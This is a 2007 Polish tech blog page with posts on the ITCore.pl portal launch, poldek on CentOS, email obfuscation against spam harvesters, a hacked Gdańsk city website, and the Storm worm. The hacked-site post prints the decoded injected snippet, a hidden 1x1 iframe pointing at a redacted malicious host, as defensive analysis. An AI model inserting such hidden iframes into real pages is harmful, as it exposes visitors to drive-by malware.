Notatki na piasku

ITCore.pl?

wrzesień 27, 2007, godzina 19:00 · Microsoft »

Wiele tygodni temu już szumnie zapowiadano, jak to się codeguru.pl oraz wss.pl połączą w jedno. W ITCore.pl. Dziś magiczna data przyszła, dziś miały te dwa serwisy przestać istnieć, a ich miejsce miał zająć ITCore.

Obawiałem się kwestii tego, jak ma u licha wyglądać integracja społeczności akademicko-programistycznej oraz administratorskiej, ale także technicznie jak zostanie rozwiązana na przykład taka kwestia jak połączenie kont użytkowników - na przykład mojego, które na wss.pl występuje w dwóch osobach (zapomniałem raz hasła, a e-mail jest zły już - login za to dobry bo “Ktos”, a konto drugie to “marcin_ktos”) z Codeguru, które występuje z nickiem “Ktos”, a cechą łączącą jest tylko hasło oraz (całe szczęście) adres e-mail. I jak widzę to scalenia kont jakoś tak chyba nie ma, dane z obydwu portali też nie są (jeszcze) przeniesione.

Dziś rano przeczytałem odpowiedniego newsa na wss.pl, i udałem się na stronę ITCore, która przywitała mnie tylko i wyłącznie obrazkiem “w budowie”. Podobnie po kilku godzinach, a ludzie w komentarzach twierdzili, że już działa. Taa. Wpisałem adres “www.itcore.pl” i ujrzałem to co trzeba, a nie to co pod “itcore.pl”. Wrażenia? Negatywne. Bardzo. Kolorystyka okropna (wiem, kwestia gustu, jednak IMO wss.pl z tych trzech jest najładniejszy), i mam wrażenie ogólnego bezładu. Różne dziwne rzeczy (”Welcome Ktos”, “-3 wypowiedzi”)… nie, po prostu słusznie napis “beta”. ITCore nie jest dopracowane, nie nadaje się na oficjalne uruchomienie. Nie w tej chwili.

Czekam dalej. Aż wyjdzie z tej magicznej fazy beta. I póki co mam nadzieję, że wss.pl i codeguru.pl przez jakiś czas będą jeszcze działać (tak, z jednego portalu zrobiły się trzy).

Technorati Tags: itcore.pl, microsoft, codeguru.pl, wss.pl

PS. Tak, wiem, że nie jestem tam widoczny, na żadnym z tych dwóch obecnych portali, ale naprawdę bardzo je lubię (aczkolwiek znacznie bardziej wss.pl) ;-)

PPS. A odnośnie migracji i przenoszenia danych to i ktos.info się do przejścia szykuje. Pliki przeniesione, strefy na serwerach DNS przygotowane. Zostaje przenieść bazę MySQL i zmienić DNS-y na jakich domena się znajduje. Może jutro?

Permalink | Komentarze

Poldek pod CentOS-em

wrzesień 20, 2007, godzina 22:17 · Linux »

Wydawać by się mogło, że na łamach tego bloga nigdy nie pojawi się wątek tego alternatywnego systemu operacyjnego na literę “L”, prawda? A może nadal myślicie, że to jest tylko żart, że ja nie mam wcale zamiaru pisać ani o poldku, ani o CentOS-ie? Bynajmniej.

To, że czasem żartuję, że Linux jest zły, a ja bronię Microsoftu, to żart. To, ze używam Windows i lubię ten system - to jest fakt. Niemniej Linuksa używam także - a dokładniej dystrybucji CentOS (czyli “otwartej” wersji Red Hat Enterprise Linux) w wersji 4.5, na moim stojącym w domu serwerze (na którym wkrótce się i ktos.info ma znaleźć). Owa dystrybucja jako swój główny menedżer pakietów wybrała, jak i Fedora, yuma. Ja jednak używając (krótko, bo krótko) dystrybucji prawie rodzimej, PLD, bardzo polubiłem poldka, który jest tamtejszym menedżerem pakietów (choć w gruncie rzeczy, jak i yum, obydwa są nakładkami na program rpm), a bardzo nie spodobał mi się yum. Zatem przyszło pytanie - czy od CentOS-em da się używać poldka?

Pamiętam, ze kiedyś próbowałem zrobić to pod Fedorą Core 6, ale poldek pod Fedorę był jedynie do wersji Core 4 i starszych. A wówczas męczyć z próbami kompilacji mi się nie chciało. Jednak do CentOS-a jest poldek dostępny, niby do wersji 4.2, a więc różnica nie jest tak duża już. Pierwsza instalacja paczki wyrzuciła prosty do naprawienia błąd, ale muszę się z wrodzonej złośliwości przyczepić.

[ktos@leia ~]$ sudo rpm -i poldek-0.20-1.i386.rpm
błąd: Niespełnione zależności:
        libdb-4.1.so jest wymagany przez poldek-0.20-1.i386
    Sugerowane sposoby spełnienia:
        /home/buildcentos/CENTOS/en/4.0/i386/CentOS/RPMS/compat-db-4.1.25-9.i386.rpm
[ktos@leia ~]$

Postawiłem się w sytuacji teraz normalnego użytkownika. Od kiedy u licha ciąg znaków /home… jest sposobem na spełnienie zależności? Trochę to niezrozumiałe ;-) Oczywiście oznacza to, że należy zainstalować ów compat-db, więc sudo yum install compat-db… i się zainstalowało. Kolejne rpm -i poldek-0.20.1.i386.rpm także. Co następnie? Próba uruchomienia poldka skończyła się z komunikatami, że nie może otworzyć swoich repozytoriów, do wersji 4.2 naturalnie. Bo takowe… nie istnieją już! Może i nie dziwne. Jednak prosta zmiana w pliku /etc/poldek/centos-source.conf - zamiana 4.2 na 4.5 w zmiennej _prefix i gotowe. Menedżer się uruchomił, pobrał co trzeba z serwerów i działa. Prawie dobrze, bo polecenie search wywołuje przy każdej (?) paczce informację “load package info failed” - zapewne z powodu innych repozytoriów PLD oraz CentOS-a. Niemniej polecenia install, ls czy get działają.

I jest fajnie.

Technorati Tags: Linux, CentOS, PLD, poldek, rpm, yum

Permalink | Komentarze (4)

Zakoduj swój e-mail?

wrzesień 18, 2007, godzina 15:58 · Komputery, Programowanie, Webmastering »

Obroną przed grasującymi po Sieci robotami, które automatycznie zbierają adresy e-mail jakie znajdą, by dołączyć do spamerskich baz danych może być - według wielu osób - różnorakie kodowanie adresu e-mail.

Jednak niestety - tak w gruncie rzeczy to większość z popularnych w internecie metod jest w gruncie rzeczy nie warta nic. Albo bardzo niewiele. Ot choćby takie coś jak popularna zamiana znaku “@” na “(at)” czy inne “[at]”. Co stoi na przeszkodzie by w spamerskim bocie po pobraniu tekstu strony zmieniać wszystkie “(at)”, “[at]” czy inne, nawet takie jak moje “(na)” po prostu na “@”? Nic nie stoi na przeszkodzie. Tak samo nic nie stoi na przeszkodzie by zamieniać znak @ czyli właśnie “@” w innym zapisie.

Niektórzy zatem tworzą bardziej skomplikowane rozwiązania kodujące adres e-mail. Oprócz zamiany samego “@” na ciąg postaci &#xx; zamieniane są wszystkie znaki w adresie. Przeglądarka wyświetla to jak trzeba, w źródle strony będzie nieczytelne. Albo dodają do adresu nadmiarowe rzeczy w rodzaju USUNTO (spam@example.com.usunto), które raczej zauważy i usunie tylko człowiek, a nie robot. Im bardziej niekonwencjonalne rozwiązanie, tym bardziej skuteczne. Te popularniejsze już przecież musiały zostać przez spamerów zauważone, prawda? Dlatego szczerze wątpię w skuteczność zamian na encje.

Niezłe jest wykorzystanie obrazka z adresem. Jednak należy wystrzegać się takich sytuacji, gdy adres e-mail jest umieszczony w obrazku (i nie do odczytania przez normalne roboty), ale adres np. komunikatora GTalk (taki sam jak e-mail) już nie jest w żaden sposób “ukryty”. Oczywiście obrazek ma też tą wadę, że jest nie do przeczytania przez osoby niewidome czy używające przeglądarek tekstowych.

I są w końcu skrypty JavaScript. Jedni stosują wymyślne podstawianie i zmiany w tekście w drzewie DOM, inni po prostu wpisują tekst na stronę używając document.write(). Jednak tak naprawdę, czy te rozwiązania są skuteczne? Przeglądarka internetowa obsługująca JavaScript wyświetla adres już na przykład w formie zdekodowanej. Zatem czy coś stoi na przeszkodzie, by stworzyć robota zbierającego adresy obsługującego JS? Albo może nawet zapytam inaczej - czy jest jakikolwiek sens tworzyć takiego robota, skoro mamy już gotowe mechanizmy do wykorzystania - właśnie silniki przeglądarek internetowych! Jakiś czas temu w ramach nauki C# stworzyłem taki program - wykorzystując kontrolkę WebBrowser potrafi ominąć większość “zabezpieczeń” adresu e-mail jakie są stosowane, bo nie operuje na normalnym źródle strony, a na tekście już “przetrawionym” przez JavaScript.

Jednak tworząc ten program (i szukając różnych metod ukrycia adresu) znalazłem zabezpieczenie, które będzie bardzo trudne do ominięcia. Wystarczy stworzyć odnośnik, do którego zdarzenia onclick będzie podpinana funkcja, która naszą przeglądarkę na właściwe źródło nakieruje. Wydaje się proste. Należy jednak pamiętać, by podmieniając adres nie napisać go gdzieś w źródle w postaci jawnej (np. var newmail = mailto:dobry@example.com), a składać go na przykład z kilku zmiennych. Dlaczego? By ustrzec się z kolei przed robotami operującymi na źródle, które z pewnością taki ładny link by zauważyły, nawet poza znacznikiem <a>.

A może są jakieś inne metody, dobre i naprawdę skuteczne, a ja o czymś nie wiem?

Technorati Tags: javascript, spam, antispam, harvester

Permalink | Komentarze (16)

Wirus prezydencki

wrzesień 16, 2007, godzina 08:47 · Internet, Komputery »

Dziś rano czytając RSS jakie mam w Google Readerze moją uwagę przykuł tekst na blogu Tomka Topy: “Strona Prezydenta Gdańska może wyrządzić szkody na Twoim komputerze…”. Tomek pisze, że tak Google pisze przy wyszukiwaniu i tak twierdzi jego antywirus AVG po zapisaniu strony na dysk.

Tak się jakoś złożyło, że ostatnio piszę sporo na temat bezpieczeństwa, więc i tym mogłem się zająć. Korzystając z mojej niewielkiej wiedzy na temat JavaScriptu sięgnąłem do źródła owej niebezpiecznej witryny i ujrzałem tam fragment kodu JavaScript, wspólny dla praktycznie wszelkiego typu złośliwych witryn - zakodowany tekst, rozkodowywany przez skrypt i wprowadzany do kodu strony poprzez document.write. Dlaczego zakodowany? Aby żaden antywirus nie zobaczył tego “na pierwszy rzut oka” oraz żeby żaden człowiek nie zobaczył tego na pierwszy rzut oka. Chwilka zabawy z trzema skryptami JS umieszczonymi na witrynie ujawniła co tak naprawdę do kodu strony wstrzykują.

<div style="visibility:hidden">
<iframe src="http://*****.com/**/upl/"
width=1 height=1></iframe></div>

Te trzy kawałki kodu różniły się tylko adresami w tych <iframe></iframe>. Co znajdowało się pod nimi? Niestety tego nie wiemy i być może się już nie dowiemy, bo dwa już nie mogą zostać znalezione, a jeden serwuje nam błąd 404. Spodziewam się, że tam znajdowały się jakieś niebezpieczne kody, być może jakieś trojany atakujące czy to Internet Explorera czy Firefoksa, jak pokazywał ten Łańcuszkowy atak na Gadu-Gadu sprzed blisko roku.

Strona zatem już niebezpieczna nie jest.

Pozostaje pytanie jednak - skąd niby niebezpieczny kod miał się wziąć na stronie prezydenta Gdańska? O uszy obiło mi się jakiś czas temu, że istnieje wirus/trojan/robak (dziś już coraz trudniej chyba określić co jest co), który korzystając z zapisanych haseł o FTP w programie Total Commander na komputerze ofiary łączy się z owymi serwerami FTP, a następnie modyfikuje pliki index.html czy index.php dodając do nich właśnie niebezpieczny kod - prowadzący choćby do strony przez którą taki wirus atakuje. Niestety nic na ten temat nie mogę wygooglać - jedyne co znalazłem na razie to informacje na temat trojanów z rodziny Trojan-PSW.Win32.PdPinch i Trojan-PSW.Win32.LdPinch których zachowanie jest o tyle podobne, że też “kradną” dane do łączenia się m.in. z serwerami FTP z użyciem programów Total Commander czy FileZilla.

Znalazłem. Zenux robi coś w tym stylu, może to jakaś jego odmiana.

Obrona? Nie zachowywać haseł w programach.

Permalink | Komentarze (4)

Cyfrowy sztorm

wrzesień 10, 2007, godzina 13:00 · Internet, Microsoft »

“Koniec Sieci jaką znamy!” Z tego typu dramatycznym okrzykiem widzę opinie na temat robaka Storm, który stworzył już podobno sieć maszyn zombie, której łączna moc obliczeniowa jest przerażająca i przewyższająca superkomputery z listy TOP500.

Fakt, Storm opanował niesamowitą liczbę maszyn i pozbyć się go będzie trudno. Widzę opinię, że “może to być bardzo trudne bez aktywnej reakcji Microsoftu” (za blogiem Piotra Wrzosińskiego), ale zastanawiam się, jaka u licha może być reakcja producenta, którego systemy są atakowane? Toż Storm, z tego co widzę, nie robi nic nowego. Rozsyła się e-mailem z załącznikiem jako EXE, instaluje jako usługa i pracuje dalej. Jak normalny trojan. Ale no rany - o ile wiem to Outlook/Outlook Express nie pozwala ot tak uruchomić pliku wykonywalnego z załącznika (bądź ostrzega, nie wiem, GMail mi usuwa EXE z załączników), Windows Vista z włączonym UAC jeszcze będzie chciał z mojej wiedzy potwierdzenia dla uruchomienia czegokolwiek co chce praw dostępu do m.in. zapisu w katalogu %SYSTEMROOT%. Ale przede wszystkim - ten plik wykonywalny w ogóle trzeba kliknąć! A to nie zależy od producenta systemu - to zależy od użytkownika! To nie jest Blaster czy Sasser który pojawia się sam i znikąd, to trzeba uruchomić samemu - problem ewidentnie leżący między klawiaturą i krzesłem. Do tego jeszcze są antywirusy i firewalle, które powinny zabronić programowi kontaktu z resztą zombie-sieci.

Ja wiem, co producent może zrobić, ale to rozwiązanie jest tak skrajne i niebezpieczne, że nie zgodzimy się na nie. Wiecie o czym mówię? Trusted Computing. Wirus/trojan/robak nie miał by cyfrowego identyfikatora w takim świecie, i żadna maszyna by go nie uruchomiła. A gdyby nawet uruchomiła - to aktualizując się sama przez sieć w końcu atak by został powstrzymany. W teorii rzecz jasna. Nie, nie mam zamiaru wskazywać drogi TC jako słusznej, nie mam zamiaru wskazywać, że komputer powinien lepiej wiedzieć ode mnie co ma zrobić.

To nie jest koniec Sieci jaką znamy. To jest potwierdzenie tego, czego baliśmy się od jakiegoś czasu. Że przestępcy mogą stworzyć botnet o niewyobrażalnym zasięgu. I potwierdzenie faktu, że ze względu na to, że użytkownik ma kontrolę nad maszyną, to nie ma możliwości zabezpieczenia przed czymś takim.

Permalink | Komentarze (10)